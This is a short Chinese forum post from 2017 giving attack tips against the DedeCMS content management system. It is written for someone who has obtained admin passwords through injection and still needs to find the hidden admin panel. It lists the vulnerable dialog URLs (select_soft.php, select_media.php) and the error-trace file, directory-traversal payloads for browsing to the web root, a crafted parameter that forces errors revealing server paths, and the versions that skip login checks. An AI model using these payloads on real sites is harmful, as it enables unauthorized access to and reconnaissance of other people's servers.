|
有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。 这个时候大家可以尝试下在地址后面加上:
1、/include/dialog/select_media.php?f=form1.murl
2、/include/dialog/select_soft.php
3.使用mysql_error 信息去试试 /data/mysql_error_trace.inc DedeCmsV5.1 FreeSP1
/include/dialog/select_soft.php?activepath=/include/FCKeditor
可以跳转目录跳转到根目录的方法为:
/include/dialog/select_soft.php?activepath=/././././././././
而且DEDECMS在访问不存在的目录时会报错如访问
/include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p
DedeCMS V5.3.1和最新的DedeCMS V5.5正式版,发现这两个版本已经进行了处理,而且只会列出目录和一些允许显示的文件,PHP是不能显示了,爆路径是一样通用的构造
/include/dialog/select_soft.php?activepath=/include/FCKeditor
也可以浏览此目录下的文件,当然你也可以跳到别的目录,但长度一定要大于设置中的目录。不过前提是你要登陆下才能利用,这个就显得有点鸡肋了另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉到根目录去。不过这些版本的访问地址有些不同。地址为
xxx.com/require/dialog/select_soft.php?activepath=/././././././././
| 
发表于 2017-11-23 16:36:29
